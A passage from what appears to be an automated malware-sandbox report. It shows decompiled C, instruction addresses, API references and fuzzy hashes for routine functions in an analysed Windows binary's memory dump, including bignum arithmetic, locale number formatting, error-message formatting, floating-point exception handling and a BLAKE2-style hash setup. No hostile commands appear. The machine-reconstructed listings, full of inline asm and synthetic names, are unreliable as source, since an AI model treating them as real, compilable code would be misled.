														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0x85d71d
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E00860E30( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E0085AABF(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E0085AABF(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E0085AABF(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}

0x0085c10c
0x0085c10f
0x0085c113
0x0085c11d
0x0085c120
0x0085c122
0x0085c124
0x0085c131
0x0085c131
0x0085c134
0x0085c134
0x0085c137
0x0085c13a
0x0085c13c
0x0085c26f
0x0085c271
0x0085c2ba
0x0085c2be
0x0085c2c4
0x0085c273
0x0085c275
0x0085c278
0x0085c27a
0x0085c27d
0x0085c27f
0x0085c281
0x0085c2b5
0x0085c2b5
0x0085c2b5
0x0085c283
0x0085c288
0x0085c28e
0x0085c28e
0x0085c291
0x0085c293
0x0085c295
0x00000000
0x00000000
0x0085c297
0x0085c298
0x0085c29b
0x0085c29e
0x0085c2a0
0x00000000
0x0085c2a2
0x00000000
0x0085c2a2
0x00000000
0x0085c2a0
0x0085c2a4
0x0085c2ab
0x0085c2af
0x0085c2b3
0x00000000
0x00000000
0x0085c2b3
0x0085c2b6
0x0085c2b6
0x0085c2b8
0x0085c2c5
0x0085c2c8
0x0085c2cb
0x0085c2ce
0x0085c2ce
0x0085c2d2
0x0085c2d5
0x0085c2d8
0x0085c2db
0x0085c2e6
0x0085c2dd
0x0085c2e2
0x0085c2e2
0x0085c2f0
0x0085c2f5
0x0085c2f8
0x0085c2fa
0x0085c304
0x0085c307
0x0085c30e
0x0085c311
0x0085c314
0x0085c31c
0x0085c322
0x0085c322
0x0085c322
0x0085c322
0x0085c314
0x0085c327
0x0085c32e
0x0085c32e
0x0085c331
0x0085c334
0x0085c566
0x0085c566
0x0085c33a
0x0085c33a
0x0085c340
0x0085c343
0x0085c346
0x0085c349
0x0085c34c
0x0085c34f
0x0085c352
0x0085c352
0x0085c355
0x0085c35c
0x0085c35c
0x0085c357
0x0085c357
0x0085c357
0x0085c35e
0x0085c362
0x0085c365
0x0085c367
0x0085c36a
0x0085c371
0x0085c374
0x0085c377
0x0085c382
0x0085c385
0x0085c38a
0x0085c38f
0x0085c396
0x0085c39b
0x0085c39d
0x0085c39f
0x0085c3a3
0x0085c3a6
0x0085c3a9
0x0085c3b1
0x0085c3ba
0x0085c3ba
0x0085c3bc
0x0085c3bf
0x0085c3bf
0x0085c3a9
0x0085c3c9
0x0085c3ce
0x0085c3d3
0x0085c3d5
0x0085c3d8
0x0085c3da
0x0085c3dd
0x0085c3e0
0x0085c3e2
0x0085c3e5
0x0085c3e8
0x0085c3ea
0x0085c3f1
0x0085c3f6
0x0085c3f9
0x0085c403
0x0085c405
0x0085c407
0x0085c40a
0x0085c40a
0x0085c40c
0x0085c40f
0x0085c412
0x0085c415
0x0085c418
0x0085c3ec
0x0085c3ec
0x0085c3ef
0x00000000
0x00000000
0x0085c3ef
0x0085c41b
0x0085c41d
0x0085c41f
0x00000000
0x0085c421
0x0085c421
0x0085c424
0x0085c426
0x0085c426
0x0085c434
0x0085c437
0x0085c43c
0x0085c43e
0x00000000
0x00000000
0x0085c440
0x0085c447
0x0085c447
0x0085c44a
0x0085c44d
0x0085c450
0x0085c453
0x0085c453
0x0085c456
0x0085c459
0x0085c45d
0x0085c460
0x0085c462
0x0085c465
0x00000000
0x00000000
0x0085c467
0x0085c465
0x0085c442
0x0085c442
0x0085c445
0x00000000
0x00000000
0x00000000
0x00000000
0x0085c445
0x0085c46c
0x0085c46c
0x00000000
0x0085c46c
0x0085c469
0x00000000
0x0085c469
0x0085c424
0x0085c41f
0x0085c46f
0x0085c46f
0x0085c471
0x0085c47b
0x0085c47b
0x0085c47e
0x0085c480
0x0085c482
0x0085c484
0x0085c489
0x0085c48c
0x0085c48c
0x0085c48f
0x0085c492
0x0085c495
0x0085c497
0x0085c4ac
0x0085c4ae
0x0085c4b0
0x0085c4b2
0x0085c4b4
0x0085c4b6
0x0085c4b8
0x0085c4ba
0x0085c4bd
0x0085c4bd
0x0085c4c1
0x0085c4c3
0x0085c4c9
0x0085c4cc
0x0085c4cc
0x0085c4cc
0x0085c4d0
0x0085c4d0
0x0085c4d5
0x0085c4d8
0x0085c4d8
0x0085c4dd
0x0085c4df
0x0085c4e1
0x0085c4e8
0x0085c4e8
0x0085c4ea
0x0085c4ef
0x0085c4f1
0x0085c4f4
0x0085c4f4
0x0085c4f7
0x0085c500
0x0085c500
0x0085c502
0x0085c502
0x0085c507
0x0085c50d
0x0085c511
0x0085c514
0x0085c517
0x0085c519
0x0085c519
0x0085c519
0x0085c51e
0x0085c51e
0x0085c521
0x0085c524
0x0085c4e3
0x0085c4e3
0x0085c4e6
0x00000000
0x00000000
0x0085c4e6
0x0085c4e1
0x0085c52b
0x0085c52b
0x0085c52c
0x0085c473
0x0085c473
0x0085c475
0x00000000
0x00000000
0x0085c475
0x0085c53c
0x0085c541
0x0085c544
0x0085c548
0x0085c549
0x0085c54c
0x0085c54f
0x0085c550
0x0085c553
0x0085c556
0x0085c559
0x0085c55c
0x0085c55c
0x0085c564
0x0085c56b
0x0085c56c
0x0085c56e
0x0085c570
0x0085c572
0x0085c575
0x0085c580
0x0085c580
0x0085c586
0x0085c586
0x0085c589
0x0085c58a
0x0085c58a
0x0085c580
0x0085c58e
0x0085c590
0x0085c592
0x0085c594
0x0085c594
0x0085c596
0x0085c59a
0x00000000
0x00000000
0x0085c59c
0x0085c59c
0x0085c59f
0x0085c5a1
0x00000000
0x00000000
0x00000000
0x0085c5a1
0x0085c594
0x0085c5a3
0x0085c5ad
0x00000000
0x00000000
0x00000000
0x0085c2b8
0x0085c142
0x0085c142
0x0085c142
0x0085c145
0x0085c148
0x0085c14b
0x0085c17c
0x0085c17e
0x0085c1c9
0x0085c1cb
0x0085c1d2
0x0085c1d9
0x0085c1dc
0x0085c1df
0x0085c1e5
0x0085c1e5
0x0085c1e6
0x0085c1e9
0x0085c1f0
0x0085c1f9
0x0085c1fe
0x0085c201
0x0085c206
0x0085c209
0x0085c20b
0x0085c210
0x0085c213
0x0085c216
0x0085c216
0x0085c216
0x0085c21a
0x0085c21d
0x0085c21d
0x0085c222
0x0085c222
0x0085c22d
0x0085c238
0x0085c238
0x0085c23b
0x0085c247
0x0085c24c
0x0085c257
0x0085c259
0x0085c25b
0x0085c261
0x0085c266
0x0085c268
0x0085c26e
0x0085c180
0x0085c18c
0x0085c18c
0x0085c18f
0x0085c19f
0x0085c1a5
0x0085c1ac
0x0085c1ae
0x0085c1b6
0x0085c1b8
0x0085c1ba
0x0085c1bf
0x0085c1c2
0x0085c1c8
0x0085c1c8
0x0085c14d
0x0085c150
0x0085c154
0x0085c15a
0x0085c169
0x0085c173
0x0085c17b
0x0085c17b
0x0085c14b
0x0085c126
0x0085c129
0x0085c12f
0x0085c12f
0x0085c115
0x0085c11b
0x0085c11b

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 018800a6249598ad81d90f5864df6e165ba524167c8a39889b5be4e4d8d1d074
Instruction ID: b59585e84a6831f72dd1d52596cc245e02d04d6817f69e2a7abfe34d661aa7ba
Opcode Fuzzy Hash: 018800a6249598ad81d90f5864df6e165ba524167c8a39889b5be4e4d8d1d074
Instruction Fuzzy Hash: ED020A71E002199FDF14CFA9C8906ADBBF1FF48315F25826AD819E7244D731AA458F94

Uniqueness

Uniqueness Score: -1.00%

Function 00849E0C, Relevance: 3.0, APIs: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00849E0C(intOrPtr _a4, intOrPtr _a8, short* _a12, int _a16) {
				short _v104;
				short _v304;
				short* _t23;
				int _t24;

				if( *0x86d610 == 0) {
					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
					 *0x88de30 = _v304;
					 *0x88de32 = 0;
					 *0x86d610 = 0x88de30;
				}
				E0083F9B6(_a4, _a8,  &_v104, 0x32);
				_t23 = _a12;
				_t24 = _a16;
				 *_t23 = 0;
				GetNumberFormatW(0x400, 0,  &_v104, 0x86d600, _t23, _t24);
				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
				return 0;
			}

0x00849e24
0x00849e32
0x00849e3f
0x00849e47
0x00849e4d
0x00849e4d
0x00849e63
0x00849e68
0x00849e6d
0x00849e77
0x00849e81
0x00849e89
0x00849e94

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00849E32
GetNumberFormatW.KERNEL32 ref: 00849E81

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 5062cc434431a40ed0f1e4dd5ea7e2745869e5d7e2c395039895aab9e7e3eb3d
Instruction ID: 0638ace213ddd0ed3e2e26838c75c05ee134117340dc833d276ecb425bf5f12f
Opcode Fuzzy Hash: 5062cc434431a40ed0f1e4dd5ea7e2745869e5d7e2c395039895aab9e7e3eb3d
Instruction Fuzzy Hash: 92014C76600309AADB109FA5DC45FAB77B8FF59710F015462FB08D7190D3B0A92487E5

Uniqueness

Uniqueness Score: -1.00%

Function 00836E20, Relevance: 3.0, APIs: 2, Instructions: 17
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00836E20(WCHAR* _a4, long _a8) {
				long _t3;
				signed int _t5;

				_t3 = GetLastError();
				if(_t3 == 0) {
					return 0;
				}
				_t5 = FormatMessageW(0x1200, 0, _t3, 0x400, _a4, _a8, 0);
				asm("sbb eax, eax");
				return  ~( ~_t5);
			}

0x00836e20
0x00836e28
0x00000000
0x00836e4f
0x00836e41
0x00836e49
0x00000000

APIs

GetLastError.KERNEL32(00840E08,?,00000200), ref: 00836E20
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00836E41

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: ecc63c65d20b39cfb44b24ccbe078834ccc0eb4b5ca9d56faee5281cbc501b2f
Instruction ID: dd434c90490438cf629d29776501b603839beb85cf18abc06528e7baa48340c4
Opcode Fuzzy Hash: ecc63c65d20b39cfb44b24ccbe078834ccc0eb4b5ca9d56faee5281cbc501b2f
Instruction Fuzzy Hash: FCD0C7753887057EFA110B74CC05F667755B795F91F20D544B356D90D0D5B0D028D715

Uniqueness

Uniqueness Score: -1.00%

Function 008606A4, Relevance: 1.8, APIs: 1, Instructions: 269
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E008606A4(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E0085E006(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E0085DF6C(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x008606b2
0x008606b9
0x008606be
0x008606c4
0x008606c7
0x008606cd
0x008606d2
0x008606d7
0x008606d7
0x008606dd
0x008606e2
0x008606e7
0x008606e7
0x008606ee
0x008606f3
0x008606f8
0x008606f8
0x008606ff
0x00860704
0x00860709
0x00860709
0x00860710
0x00860715
0x0086071a
0x0086071a
0x00860722
0x00860732
0x00860744
0x00860756
0x00860769
0x0086077b
0x00860783
0x00860788
0x0086078d
0x0086078d
0x00860794
0x00860799
0x00860799
0x008607a0
0x008607a5
0x008607a5
0x008607ac
0x008607b1
0x008607b1
0x008607b8
0x008607bd
0x008607bd
0x008607c7
0x008607c9
0x00860803
0x008607cb
0x008607d0
0x008607f4
0x008607fc
0x008607f0
0x008607f0
0x00860806
0x0086080d
0x0086080f
0x00860831
0x00860839
0x0086083c
0x0086083c
0x0086083e
0x0086083e
0x00860849
0x0086084f
0x00860854
0x0086085b
0x00860895
0x008608a0
0x008608a6
0x008608a9
0x008608ac
0x008608b8
0x008608c0
0x0086085d
0x00860860
0x0086086c
0x00860872
0x00860878
0x0086087b
0x00860884
0x00860884
0x008608c3
0x008608d1
0x008608d7
0x008608de
0x008608e0
0x008608e0
0x008608e7
0x008608e9
0x008608e9
0x008608f0
0x008608f2
0x008608f2
0x008608f9
0x008608fb
0x008608fb
0x00860902
0x00860904
0x00860904
0x00860911
0x00860914
0x0086094b
0x00860916
0x00860916
0x00860919
0x00860944
0x00860939
0x00860939
0x0086094d
0x00860955
0x00860958
0x00860977
0x0086097c
0x0086097c
0x0086097e
0x00860983
0x0086098f
0x00860985
0x00860988
0x00860988
0x00860994
0x00860994
0x0086095a
0x0086095d
0x0086096c
0x00000000
0x0086096c
0x0086095f
0x00860962
0x00860964
0x00860964
0x00000000
0x00860962
0x0086091b
0x0086091e
0x00860934
0x00000000
0x00860934
0x00860923
0x00860925
0x00860925
0x00860923
0x00000000
0x00860914
0x00860816
0x00860824
0x0086082c
0x00000000
0x0086082c
0x0086081a
0x0086081f
0x0086081f
0x00000000
0x0086081a
0x008607d7
0x008607e5
0x008607ed
0x00000000
0x008607ed
0x008607db
0x008607e0
0x008607e0
0x008607db

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0086069F,?,?,00000008,?,?,0086033F,00000000), ref: 008608D1

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 54cbc98082c33b4dd21d9eeb7f5ef59baf397a8f3b117229c79c1ddc1e6d2db2
Instruction ID: ed86f7568b679578e67cf162dcf327557c201645ec2d97b82b2bae6ad1714107
Opcode Fuzzy Hash: 54cbc98082c33b4dd21d9eeb7f5ef59baf397a8f3b117229c79c1ddc1e6d2db2
Instruction Fuzzy Hash: 0CB15D35510608DFD719CF28C48AB667BE1FF45364F2A8658E89ACF2A2C335E991CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00833FBD, Relevance: 1.6, Strings: 1, Instructions: 332
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E00833FBD() {
				void* _t230;
				signed int* _t231;
				intOrPtr _t240;
				signed int _t245;
				intOrPtr _t246;
				signed int _t257;
				intOrPtr _t258;
				signed int _t269;
				intOrPtr _t270;
				signed int _t275;
				signed int _t280;
				signed int _t285;
				signed int _t290;
				signed int _t295;
				intOrPtr _t296;
				signed int _t301;
				intOrPtr _t302;
				signed int _t307;
				intOrPtr _t308;
				signed int _t313;
				intOrPtr _t314;
				signed int _t319;
				signed int _t324;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t348;
				signed int _t350;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t368;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t374;
				signed int _t375;
				intOrPtr _t376;
				intOrPtr _t377;
				signed int _t379;
				signed int _t381;
				intOrPtr _t383;
				signed int _t385;
				signed int _t386;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				intOrPtr _t396;
				signed int _t398;
				intOrPtr _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				signed int _t414;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				intOrPtr _t431;
				signed int _t433;
				intOrPtr _t434;
				void* _t435;
				void* _t436;
				void* _t437;

				_t377 =  *((intOrPtr*)(_t435 + 0xc0));
				_t342 = 0x10;
				 *((intOrPtr*)(_t435 + 0x18)) = 0x3c6ef372;
				memcpy(_t435 + 0x8c,  *(_t435 + 0xd0), _t342 << 2);
				_t436 = _t435 + 0xc;
				_push(8);
				_t230 = memcpy(_t436 + 0x4c,  *(_t377 + 0xf4), 0 << 2);
				_t437 = _t436 + 0xc;
				_t418 =  *_t230 ^ 0x510e527f;
				_t231 =  *(_t377 + 0xfc);
				_t407 =  *(_t230 + 4) ^ 0x9b05688c;
				_t334 =  *(_t437 + 0x64);
				 *(_t437 + 0x28) = 0x6a09e667;
				 *(_t437 + 0x30) = 0xbb67ae85;
				_t379 =  *_t231 ^ 0x1f83d9ab;
				_t348 =  *(_t437 + 0x5c);
				 *(_t437 + 0x44) = _t231[1] ^ 0x5be0cd19;
				 *(_t437 + 0x3c) =  *(_t437 + 0x68);
				 *(_t437 + 0x1c) =  *(_t437 + 0x60);
				 *(_t437 + 0x2c) =  *(_t437 + 0x58);
				 *(_t437 + 0x38) =  *(_t437 + 0x54);
